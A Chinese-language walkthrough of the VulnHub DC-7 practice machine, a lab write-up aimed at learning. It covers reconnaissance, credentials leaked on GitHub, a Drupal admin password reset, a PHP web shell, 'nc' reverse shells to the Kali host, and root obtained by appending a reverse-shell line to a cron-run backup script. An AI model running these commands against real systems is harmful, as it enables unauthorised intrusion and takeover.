DC-7靶机实战练习

靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip
环境:VMware 15虚拟机软件

DC-7靶机IP地址:192.168.146.138

Kali的IP地址:192.168.146.130

文章目录

    • 第一部分 信息收集
      • 第一步 扫描主机
      • 第二步 扫描端口
      • 第三步 收集网站信息
      • 第四步 访问80端口
      • 第五步 收集@DC7USER信息
      • 第六步 下载源码 收集文件信息
    • 第二部分 漏洞查找
      • 第一步 ssh登录dc7user账号
      • 第二步 查找文件
      • 第三步 Drupal重置网站管理员密码
      • 第四步 登录admin账号
    • 第三部分 漏洞利用(Drupal 8文件上传漏洞)
      • 第一步 收集Drupal 8信息
      • 第二步 配置php代码
      • 第三步 写入一句话木马(也可以上传其他可利用的木马文件)
      • 第四步 连接到靶机(也可直接操作不用反弹到kali)
      • 第五步 反弹shell到kali
    • 第四部分 提权
      • 第一步 进入交互shell
      • 第二步 查看可利用文件
      • 第三步 当前用户 是www-data
      • 第四步 获取root权限
    • 免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

第一部分 信息收集

第一步 扫描主机

[nmap -sP 192.168.146.0/24]
DC-7靶机实战练习_第1张图片

第二步 扫描端口

[nmap -sV 192.168.146.138]
DC-7靶机实战练习_第2张图片

第三步 收集网站信息

[whatweb http://192.168.146.138]
( 使用Drupal 8搭建的网站)
在这里插入图片描述

第四步 访问80端口

DC-7靶机实战练习_第3张图片

第五步 收集@DC7USER信息

发现是一个Twitter用户,进入Twitter后搜索这个用户,进入这个用户首页,发现一个GitHub的链接
[ https://github.com/Dc7User?tab=repositories]
[ https://github.com/Dc7User/staffdb]
DC-7靶机实战练习_第4张图片DC-7靶机实战练习_第5张图片

第六步 下载源码 收集文件信息

dc7user
MdR3xOgB7#dW
DC-7靶机实战练习_第6张图片

第二部分 漏洞查找

第一步 ssh登录dc7user账号

[ssh [email protected]]
DC-7靶机实战练习_第7张图片

第二步 查找文件

[ls]
[cat mbox]
[cd /var/scripts]
[cat backups.sh]
DC-7靶机实战练习_第8张图片DC-7靶机实战练习_第9张图片

第三步 Drupal重置网站管理员密码

[cd /var/www/html/]
[drush user-password admin --password=“qweasd”]
在这里插入图片描述

第四步 登录admin账号

DC-7靶机实战练习_第10张图片DC-7靶机实战练习_第11张图片

第三部分 漏洞利用(Drupal 8文件上传漏洞)

第一步 收集Drupal 8信息

[ https://www.drupal.org/project/php]
[https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz]
DC-7靶机实战练习_第12张图片在这里插入图片描述

第二步 配置php代码

在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,

DC-7靶机实战练习_第13张图片DC-7靶机实战练习_第14张图片DC-7靶机实战练习_第15张图片DC-7靶机实战练习_第16张图片

第三步 写入一句话木马(也可以上传其他可利用的木马文件)

修改"welcome to dc-7"–>选择php编码–>写入一句话木马–>保存
DC-7靶机实战练习_第17张图片DC-7靶机实战练习_第18张图片

第四步 连接到靶机(也可直接操作不用反弹到kali)

DC-7靶机实战练习_第19张图片DC-7靶机实战练习_第20张图片

第五步 反弹shell到kali

[nc -e /bin/bash 192.168.146.130 9999]
DC-7靶机实战练习_第21张图片

第四部分 提权

第一步 进入交互shell

[python -c ‘import pty;pty.spawn("/bin/bash")’]

第二步 查看可利用文件

在/opt/scripts目录下的backups.sh脚本文件所属组是www-data
在这里插入图片描述

第三步 当前用户 是www-data

DC-7靶机实战练习_第22张图片

第四步 获取root权限

写入反弹shell代码到backups.sh脚本文件中,并在kali监听777端口,等待计划任务执行,稍微等待后成功getshell
[echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.146.130 4567 >/tmp/f” >> backups.sh]
DC-7靶机实战练习_第23张图片
[cd ]
[cat theflag.txt]

DC-7靶机实战练习_第24张图片

免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

你可能感兴趣的:(靶机练习)